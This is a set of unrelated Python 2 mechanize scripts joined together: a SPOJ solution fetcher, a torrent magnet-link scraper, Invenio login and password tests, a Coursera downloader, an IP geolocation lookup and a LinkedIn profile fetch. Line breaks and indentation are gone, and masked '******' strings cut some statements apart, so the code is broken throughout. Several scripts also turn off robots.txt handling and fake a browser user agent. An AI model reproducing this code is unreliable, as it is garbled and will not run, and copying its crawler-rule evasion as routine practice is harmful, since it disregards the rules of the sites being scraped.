def getSolutions(path_prefix, path_proxy): global br, username, password # create a browser object br = Browser() # add proxy support to browser if len(path_proxy) != 0: protocol, proxy = options.proxy.split("://") br.set_proxies({protocol: proxy}) # let browser fool robots.txt br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; \ rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] br.set_handle_robots(False) print "Enter yout SPOJ username :"******"Authenticating " + username br.open("http://spoj.com/") for form in br.forms(): if form.attrs['id'] == 'login-form': br.form = form break br["login_user"] = username br["password"] = password # sign in for a day to avoid timeouts br.find_control(name="autologin").selected = True br.form.action = "http://www.spoj.com" response = br.submit() verify = response.read() if (verify.find("Authentication failed!") != -1): print "Error authenticating - " + username exit(0) # grab the signed submissions list print "Grabbing siglist for " + username siglist = br.open("http://www.spoj.com/status/" + username + "/signedlist") # dump first nine useless lines in signed list for formatting for i in xrange(9): siglist.readline() # make a list of all AC's and challenges print "Filtering siglist for AC/Challenge solutions..." mysublist = list() while True: temp = siglist.readline() if temp == '\------------------------------------------------------------------------------/\n': # reached end of siglist break if not len(temp): print "Reached EOF, siglist format has probably changed," + \ " contact author." exit(1) entry = [x.strip() for x in temp.split('|')] if entry[4] == 'AC' or entry[4].isdigit(): mysublist.append(entry) print "Done !!!" return mysublist
#print soup #print year tables = soup.findChildren('table') table = tables[4] for row in table.findAll('tr'): h3 = row.findAll('h3') name = h3[0].string print name td = row.findAll('td') role = td[2].string print role #cover_link = col[3].img['src'] record = (str(year), name, role) print "|".join(record) mech = Browser() url = "http://europa.eu/whoiswho/public/index.cfm?fuseaction=idea.hierarchy&nodeID=370629&personID=150128&lang=en" page1 = mech.open(url) html1 = page1.read() soup1 = BeautifulSoup(html1) extract(soup1, 2007) #page2 = mech.follow_link(text_regex="Next") #html2 = page2.read() #soup2 = BeautifulSoup(html2) #extract(soup2, 2006)import scraperwiki #From http://palewi.re/posts/2008/04/20/python-recipe-grab-a-page-scrape-a-table-download-a-file/ #!/usr/bin/env python from mechanize import Browser from BeautifulSoup import BeautifulSoup
def test_select_records_per_group(self): """webuser - test of user preferences setting""" # logging in as admin browser = Browser() browser.open(CFG_SITE_SECURE_URL + "/youraccount/login") browser.select_form(nr=0) browser['nickname'] = 'admin' browser['password'] = '' browser.submit() expected_response = "You are logged in as admin" login_response_body = browser.response().read() try: login_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, login_response_body)) # Going to edit page and setting records per group to 20 browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit/WebSearchSettings") browser.select_form(nr=0) browser['rg'] = ["25"] browser.submit() expected_response = "Data has been saved." changed_settings_body = browser.response().read() try: changed_settings_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, changed_settings_body)) # Going to the search page, making an empty search browser.open(CFG_SITE_SECURE_URL) browser.select_form(name="search") browser.submit() expected_response = "1 to 25" records_found_body = browser.response().read() try: records_found_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, records_found_body)) # Going again to edit and setting records per group back to 10 browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit/WebSearchSettings") browser.select_form(name="edit") browser['rg'] = ["10"] browser.submit() expected_response = "Data has been saved." changed_settings_body = browser.response().read() try: changed_settings_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, changed_settings_body)) # Logging out! browser.open(CFG_SITE_SECURE_URL + "/youraccount/logout") expected_response = "You are no longer recognized" logout_response_body = browser.response().read() try: logout_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, logout_response_body)) # Logging in again browser.open(CFG_SITE_SECURE_URL + "/youraccount/login") browser.select_form(nr=0) browser['nickname'] = 'admin' browser['password'] = '' browser.submit() expected_response = "You are logged in as admin" login_response_body = browser.response().read() try: login_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, login_response_body)) # Let's go to search and check that the setting is still there browser.open(CFG_SITE_SECURE_URL) browser.select_form(name="search") browser.submit() expected_response = "1 to 10" records_found_body = browser.response().read() try: records_found_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, records_found_body)) return
class Lime(Torrent): def __init__(self, otherFilters, minSize, debug): self._urlBase = "https://www.limetorrents.cc" self._urlSearch = u"https://www.limetorrents.cc/search/all/{name} {episode}" self._languageDict = {"english": 2, "spanish": 14} #To MB self._minSize = int(minSize) / 1048576 self._debug = debug extraFilters = u"{otherFilters}" if otherFilters != "": self._otherFilers = u" " + otherFilters else: self._otherFilers = "" self._urlSearch = ''.join([ self._urlSearch, extraFilters.format(otherFilters=self._otherFilers), '/seeds/1/' ]) self._browser = Browser() self._browser.set_handle_robots(False) self._cookieJar = cookielib.LWPCookieJar() self._browser.set_cookiejar(self._cookieJar) self._browser.addheaders = [( 'User-agent', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0' ), ('Accept', '*/*'), ('Accept-Encoding', "gzip,deflate")] self._browser.open(self._urlBase) def episodeSearch(self, serie, episode): searchQuery = self._urlSearch.format( name=serie, episode=episode["number"]).replace(" ", "-") logging.debug(u"searchURL: {}".format(searchQuery)) try: self._browser.open(searchQuery) gzipContent = self._browser.response().read() html = gzip.GzipFile(fileobj=StringIO.StringIO(gzipContent)).read() #Scrapping the page. soup = BeautifulSoup(html) if (soup.body.findAll(text='No results found')): logging.error( u"There wasn't results for: {}".format(searchQuery)) return None items = soup.findAll('table', {"class": "table2"})[1].findAll('tr') #We skip the first tr because is the header. (no tbody in html). for item in items[1:]: #print item #print item.findAll("td" ,{"class": "tdnormal"}) contentLength = item.findAll( "td", {"class": "tdnormal"})[1].text.split(' ') if contentLength[1][:2] != 'GB' and float( contentLength[0]) < self._minSize: logging.warning(u"Torrent to small: {}".format(' '.join( [contentLength[0], contentLength[1][:2]]))) continue linkA = item.find("div", {"class": "tt-name"}).findAll("a")[1] infoUrl = linkA['href'] name = linkA.text logging.info(u"Going to download: {}".format(name)) logging.info(u"File size: {}".format(' '.join( [contentLength[0], contentLength[1][:2]]))) self._browser.open(''.join([self._urlBase, infoUrl])) gzipContent = self._browser.response().read() html = gzip.GzipFile( fileobj=StringIO.StringIO(gzipContent)).read() soup2 = BeautifulSoup(html) #TODO: posibleLinks = soup2.findAll('div', {'class': 'downloadarea'}) for link in posibleLinks: href = link.find('a')['href'] if href[0:7] == 'magnet:': return href break return None except HTTPError, e: logging.error( u"There was an error in the URL {}.".format(searchQuery)) return None
from BeautifulSoup import BeautifulSoup, SoupStrainer import sys print sys.stdout.encoding import re from mechanize import Browser f=open("ips2", "r") br = Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] for line in f: url="http://www.geoiptool.com/es/?IP="+line print url response=br.open(url) data = response.read() for item in data.split("\n"): if "flag" in item and "class" in item: print item
def test_password_setting(self): """webuser - check password settings""" browser = Browser() browser.open(CFG_SITE_SECURE_URL + "/youraccount/login") browser.select_form(nr=0) browser['nickname'] = 'admin' browser['password'] = '' browser.submit() expected_response = "You are logged in as admin" login_response_body = browser.response().read() try: login_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, login_response_body)) # Going to set new password from "" to "123" browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit") browser.select_form(name="edit_password") browser['old_password'] = "" browser['password'] = "******" browser['password2'] = "123" browser.submit() expected_response = "Password successfully edited" change_password_body = browser.response().read() try: change_password_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, change_password_body)) # Going to set a wrong old password browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit") browser.select_form(name="edit_password") browser['old_password'] = "******" browser['password'] = "******" browser['password2'] = "123" browser.submit() expected_response = "Wrong old password inserted" change_password_body = browser.response().read() try: change_password_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, change_password_body)) # Going to put different new passwords browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit") browser.select_form(name="edit_password") browser['old_password'] = "******" browser['password'] = "******" browser['password2'] = "321" browser.submit() expected_response = "Both passwords must match" change_password_body = browser.response().read() try: change_password_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, change_password_body)) # Reset the situation browser.open(CFG_SITE_SECURE_URL + "/youraccount/edit") browser.select_form(name="edit_password") browser['old_password'] = "******" browser['password'] = "" browser['password2'] = "" browser.submit() expected_response = "Password successfully edited" change_password_body = browser.response().read() try: change_password_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, change_password_body))
def on_task_start(self, task, config): try: from mechanize import Browser except ImportError: raise PluginError('mechanize required (python module), please install it.', log) userfield = config.get('userfield', 'username') passfield = config.get('passfield', 'password') url = config['url'] username = config['username'] password = config['password'] br = Browser() br.set_handle_robots(False) try: br.open(url) except Exception as e: # TODO: improve error handling raise PluginError('Unable to post login form', log) #br.set_debug_redirects(True) #br.set_debug_responses(True) #br.set_debug_http(True) for form in br.forms(): loginform = form try: loginform[userfield] = username loginform[passfield] = password break except Exception as e: pass else: received = os.path.join(task.manager.config_base, 'received') if not os.path.isdir(received): os.mkdir(received) filename = os.path.join(received, '%s.formlogin.html' % task.name) f = open(filename, 'w') f.write(br.response().get_data()) f.close() log.critical('I have saved the login page content to %s for you to view' % filename) raise PluginError('Unable to find login fields', log) br.form = loginform br.submit() cookiejar = br._ua_handlers["_cookies"].cookiejar # Add cookiejar to our requests session task.requests.add_cookiejar(cookiejar) # Add handler to urllib2 default opener for backwards compatibility handler = urllib2.HTTPCookieProcessor(cookiejar) if urllib2._opener: log.debug('Adding HTTPCookieProcessor to default opener') urllib2._opener.add_handler(handler) else: log.debug('Creating new opener and installing it') urllib2.install_opener(urllib2.build_opener(handler))
def test_email_caseless(self): """webuser - check email caseless""" browser = Browser() browser.open(CFG_SITE_SECURE_URL + "/youraccount/register") browser.select_form(nr=0) browser['email'] = '*****@*****.**' browser['nickname'] = 'foobar' browser['password'] = '******' browser['password2'] = '123456' browser.submit() expected_response = "Account created" login_response_body = browser.response().read() try: login_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, login_response_body)) browser = Browser() browser.open(CFG_SITE_SECURE_URL + "/youraccount/register") browser.select_form(nr=0) browser['email'] = '*****@*****.**' browser['nickname'] = 'foobar2' browser['password'] = '******' browser['password2'] = '123456' browser.submit() expected_response = "Registration failure" login_response_body = browser.response().read() try: login_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, login_response_body)) browser = Browser() browser.open(CFG_SITE_SECURE_URL + "/youraccount/register") browser.select_form(nr=0) browser['email'] = '*****@*****.**' browser['nickname'] = 'foobar2' browser['password'] = '******' browser['password2'] = '123456' browser.submit() expected_response = "Registration failure" login_response_body = browser.response().read() try: login_response_body.index(expected_response) except ValueError: self.fail("Expected to see %s, got %s." % \ (expected_response, login_response_body))
class CourseraDownloader(object): """ Class to download content (videos, lecture notes, ...) from coursera.org for use offline. https://github.com/dgorissen/coursera-dl """ BASE_URL = 'http://class.coursera.org/%s' HOME_URL = BASE_URL + '/class/index' LECTURE_URL = BASE_URL + '/lecture/index' LOGIN_URL = BASE_URL + '/auth/auth_redirector?type=login&subtype=normal' QUIZ_URL = BASE_URL + '/quiz/index' DEFAULT_PARSER = "lxml" def __init__(self,username,password,parser=DEFAULT_PARSER): """Requires your coursera username and password. You can also specify the parser to use (defaults to lxml), see http://www.crummy.com/software/BeautifulSoup/bs4/doc/#installing-a-parser """ self.username = username self.password = password self.parser = parser self.browser = Browser() self.browser.set_handle_robots(False) def login(self,course_name): print "* Authenticating as %s..." % self.username # open the course login page page = self.browser.open(self.LOGIN_URL % course_name) # check if we are already logged in by checking for a password field bs = BeautifulSoup(page,self.parser) pwdfield = bs.findAll("input",{"id":"password_login"}) if pwdfield: self.browser.form = self.browser.forms().next() self.browser['email'] = self.username self.browser['password'] = self.password r = self.browser.submit() # check that authentication actually succeeded bs2 = BeautifulSoup(r.read(),self.parser) title = bs2.title.string if title.find("Login Failed") > 0: raise Exception("Failed to authenticate as %s" % (self.username,)) else: # no login form, already logged in print "* Already logged in" def course_name_from_url(self,course_url): """Given the course URL, return the name, e.g., algo2012-p2""" return course_url.split('/')[3] def lecture_url_from_name(self,course_name): """Given the name of a course, return the video lecture url""" return self.LECTURE_URL % course_name def get_downloadable_content(self,course_url): """Given the video lecture URL of the course, return a list of all downloadable resources.""" cname = self.course_name_from_url(course_url) print "* Collecting downloadable content from " + course_url # get the course name, and redirect to the course lecture page vidpage = self.browser.open(course_url) # extract the weekly classes soup = BeautifulSoup(vidpage,self.parser) headers = soup.findAll("h3", { "class" : "list_header" }) weeklyTopics = [] allClasses = {} # for each weekly class for header in headers: ul = header.findNext('ul') sanitisedHeaderName = sanitiseFileName(header.text) weeklyTopics.append(sanitisedHeaderName) lis = ul.findAll('li') weekClasses = {} # for each lecture in a weekly class classNames = [] for li in lis: className = sanitiseFileName(li.a.text) classNames.append(className) classResources = li.find('div', {'class': 'item_resource'}) hrefs = classResources.findAll('a') # for each resource of that lecture (slides, pdf, ...) # (dont set a filename here, that will be inferred from the headers) resourceLinks = [ (h['href'],None) for h in hrefs] # check if the video is included in the resources, if not, try # do download it directly hasvid = [x for x,_ in resourceLinks if x.find('.mp4') > 0] if not hasvid: ll = li.find('a',{'class':'lecture-link'}) lurl = ll['data-lecture-view-link'] p = self.browser.open(lurl) bb = BeautifulSoup(p,self.parser) vobj = bb.find('source',type="video/mp4") if not vobj: print " Warning: Failed to find video for %s" % className else: vurl = vobj['src'] # build the matching filename fn = className + ".mp4" resourceLinks.append( (vurl,fn) ) weekClasses[className] = resourceLinks # keep track of the list of classNames in the order they appear in the html weekClasses['classNames'] = classNames allClasses[sanitisedHeaderName] = weekClasses return (weeklyTopics, allClasses) def download(self, url, target_dir=".", target_fname=None): """Download the url to the given filename""" r = self.browser.open(url) # get the headers headers = r.info() # get the content length (if present) clen = int(headers['Content-Length']) if 'Content-Length' in headers else -1 # build the absolute path we are going to write to fname = target_fname or sanitiseFileName(CourseraDownloader.getFileName(headers)) or CourseraDownloader.getFileNameFromURL(url) filepath = os.path.join(target_dir,fname) dl = True if os.path.exists(filepath): if clen > 0: fs = os.path.getsize(filepath) delta = clen - fs # all we know is that the current filesize may be shorter than it should be and the content length may be incorrect # overwrite the file if the reported content length is bigger than what we have already by at least k bytes (arbitrary) # TODO this is still not foolproof as the fundamental problem is that the content length cannot be trusted # so this really needs to be avoided and replaced by something else, eg., explicitly storing what downloaded correctly if delta > 2: print ' - "%s" seems incomplete, downloading again' % fname else: print ' - "%s" already exists, skipping' % fname dl = False else: # missing or invalid content length # assume all is ok... dl = False try: if dl: self.browser.retrieve(url,filepath) except Exception as e: print "Failed to download url %s to %s: %s" % (url,filepath,e) def download_course(self,cname,dest_dir="."): """Download all the contents (quizzes, videos, lecture notes, ...) of the course to the given destination directory (defaults to .)""" # Ensure we are logged in self.login(cname) # get the lecture url course_url = self.lecture_url_from_name(cname) (weeklyTopics, allClasses) = self.get_downloadable_content(course_url) print '* Got all downloadable content for ' + cname course_dir = os.path.abspath(os.path.join(dest_dir,cname)) # ensure the target dir exists if not os.path.exists(course_dir): os.mkdir(course_dir) print "* " + cname + " will be downloaded to " + course_dir # ensure the course directory exists if not os.path.exists(course_dir): os.makedirs(course_dir) # download the standard pages print " - Downloading lecture/syllabus pages" self.download(self.HOME_URL % cname,target_dir=course_dir,target_fname="index.html") self.download(course_url,target_dir=course_dir,target_fname="lectures.html") # commented out because of https://github.com/dgorissen/coursera-dl/issues/2 # self.download((self.BASE_URL + '/wiki/view?page=syllabus') % cname, target_dir=course_dir,target_fname="syllabus.html") # download the quizzes & homeworks #for qt in ['quiz','homework']: # print " - Downloading the '%s' quizzes" % qt # try: # self.download_quizzes(cname,course_dir,quiz_type=qt) # except Exception as e: # print " - Failed %s" % e # now download the actual content (video's, lecture notes, ...) for j,weeklyTopic in enumerate(weeklyTopics,start=1): if weeklyTopic not in allClasses: #print 'Weekly topic not in all classes:', weeklyTopic continue # ensure the week dir exists # add a numeric prefix to the week directory name to ensure chronological ordering wkdirname = str(j).zfill(2) + " - " + weeklyTopic wkdir = os.path.join(course_dir,wkdirname) if not os.path.exists(wkdir): os.makedirs(wkdir) weekClasses = allClasses[weeklyTopic] classNames = weekClasses['classNames'] print " - " + weeklyTopic for i,className in enumerate(classNames,start=1): if className not in weekClasses: continue classResources = weekClasses[className] # ensure the class dir exists clsdirname = str(i).zfill(2) + " - " + className clsdir = os.path.join(wkdir,clsdirname) if not os.path.exists(clsdir): os.makedirs(clsdir) print " - Downloading resources for " + className for classResource,tfname in classResources: if not isValidURL(classResource): absoluteURLGen = AbsoluteURLGen(course_url) classResource = absoluteURLGen.get_absolute(classResource) print " -" + classResource, ' - is not a valid url' if not isValidURL(classResource): print " -" + classResource, ' - is not a valid url' continue try: #print ' - Downloading ', classResource self.download(classResource,target_dir=clsdir,target_fname=tfname) except Exception as e: print " - failed: ",classResource,e def download_quizzes(self,course,target_dir,quiz_type="quiz"): """Download each of the quizzes as separate html files, the quiz type is typically quiz or homework""" # extract the list of all quizzes qurl = (self.QUIZ_URL + "?quiz_type=" + quiz_type) % course p = self.browser.open(qurl) bs = BeautifulSoup(p,self.parser) qlist = bs.find('div',{'class':'item_list'}) qurls = [q['href'].replace('/start?','/attempt?') for q in qlist.findAll('a',{'class':'btn primary'})] titles = [t.string for t in qlist.findAll('h4')] # ensure the target directory exists dir = os.path.join(target_dir,quiz_type) try: os.makedirs(dir) except OSError as e: if e.errno == errno.EEXIST: pass else: raise # download each one for i,it in enumerate(zip(qurls,titles),start=1): q,t = it fname = os.path.join(dir,str(i).zfill(2) + " - " + sanitiseFileName(t) + ".html") if os.path.exists(fname): pass #print " - already exists, skipping" else: self.browser.retrieve(q,fname) @staticmethod def extractFileName(contentDispositionString): #print contentDispositionString pattern = 'attachment; filename="(.*?)"' m = re.search(pattern, contentDispositionString) try: return m.group(1) except Exception: return '' @staticmethod def getFileName(header): try: return CourseraDownloader.extractFileName(header['Content-Disposition']).lstrip() except Exception: return '' @staticmethod def getFileNameFromURL(url): splits = url.split('/') splits.reverse() splits = urllib.unquote(splits[0]) #Seeing slash in the unquoted fragment splits = splits.split('/') fname = splits[len(splits) - 1] # add an extension if none ext = os.path.splitext(fname)[1] if not ext: fname += ".html" return fname
import mechanize from mechanize import Browser from bs4 import BeautifulSoup as BS import json br = Browser() # Browser options # Ignore robots.txt. Do not do this without thought and consideration. br.set_handle_robots(False) # Don't add Referer (sic) header br.set_handle_referer(False) # Follows refresh 0 but not hangs on refresh > 0 br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.set_handle_equiv(True) br.set_handle_gzip(True) br.set_handle_redirect(True) #Setting the user agent br.addheaders = [( 'User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' )] br.open('https://www.linkedin.com/in/shashankgaurav') #Getting the response in beautifulsoup soup = BS(br.response().read(), 'lxml')